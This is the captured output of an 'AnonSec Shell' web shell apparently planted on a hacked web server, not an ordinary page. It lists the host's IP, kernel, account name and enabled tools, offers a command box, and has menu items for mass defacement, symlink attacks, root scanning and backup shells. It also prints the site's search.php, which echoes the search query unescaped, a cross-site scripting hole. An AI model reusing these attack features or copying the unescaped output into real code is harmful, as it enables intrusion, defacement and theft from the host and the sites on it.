AnonSec Shell
Server IP : 144.76.79.100  /  Your IP : 216.73.216.103   [ Reverse IP ]
Web Server : Apache
System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User : razzlestore ( 1092)
PHP Version : 8.2.29
Disable Function : NONE
Domains : 343 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/public_html/application/views/front/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/public_html/application/views/front/search.php
<section class="category-hero bg-4">
    <div class="container">
        <div class="media">
            <div class="media-body align-self-center">
                <h5 class="text-white search-query">You searched for <?php $cat_name = 'Clothing'; echo !empty($categories_data->category_name)?'<a href="'.base_url('category/'.$categories_data->category_slug).'">'.$categories_data->category_name.'</a> > ':'';?><?php echo '"'.$query.'"';?></h5>
            </div>
            
        </div>
    </div>
</section>
<?php $store_categories = array();?>
<?php if(!empty($stores_data)):?>
<section class="clients-slider-wrapper search-clients-slider-wrapper section">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="clients-slider owl-carousel owl-theme">
                    <?php foreach($stores_data as $store):?>
                    <?php 
                        if($store['store_home_page_visibility'] == 1){
                            $store_categories[$store['category_id']] = array('category_name' => $store['category_name'], 'category_slug' => $store['category_slug']) ;
                        }
                    ?>
                    <div class="item">
                        <a href="<?php echo base_url($store['store_slug']);?>">
                            <!-- Slider Image -->
                            <img src="<?php echo base_url('uploads/store/').$store['store_logo'];?>" alt="store-logo">
                        </a>
                    </div>
                    <?php endforeach;?>
                </div>

            </div>
        </div>
    </div>
</section>
<?php endif;?>
<section class="popular-deals section pt-0">
	<div class="container">
		<div class="row offers-row">
		    <?php foreach($offers_data as $offer):?>
			<div class="col-sm-12 col-lg-6">
                <div class="deal-item bg-light">
                	<div class="media">
                		<div class="img-content align-self-center">
                			<a href="<?php echo base_url($offer['store_slug']);?>">
                				<img src="<?php echo base_url('uploads/store/').$offer['store_logo'];?>" >
                			</a>
                		</div>
                		<div class="media-body">
                			<h5 class="mt-0"><?php echo $offer['offer_title'];?></h5>
                			<ul class="list-inline">
                                <li>
                                    <a data-affliate-url="<?php echo $offer['offer_affiliate_url'];?>" href="#offer_<?php echo $offer['offer_id'];?>" class="btn btn-dual btn-<?php echo $offer['offer_type'];?> offer-btn"><span class="upper"><?php echo ($offer['offer_type'] == 'code')?'Show Code':'Get Deal';?></span><?php if($offer['offer_type'] == 'code'):?><span class="lower"><?php echo 'code'.substr($offer['offer_code'], -4);?></span><?php endif;?></a>
                                </li>
                				<li class="list-inline-item"><a href="#"><?php echo ($offer['offer_expiry_date_days_left'] < 0)?'Offer Expired':'Offer will expire in '.$offer['offer_expiry_date_days_left'].' days';?></a>
                				</li>
                			</ul>
                		</div>
                	</div>
                </div>
            </div>
            <?php endforeach;?>
		</div>
	</div>
</section>

Anon7 - 2022
AnonSec Team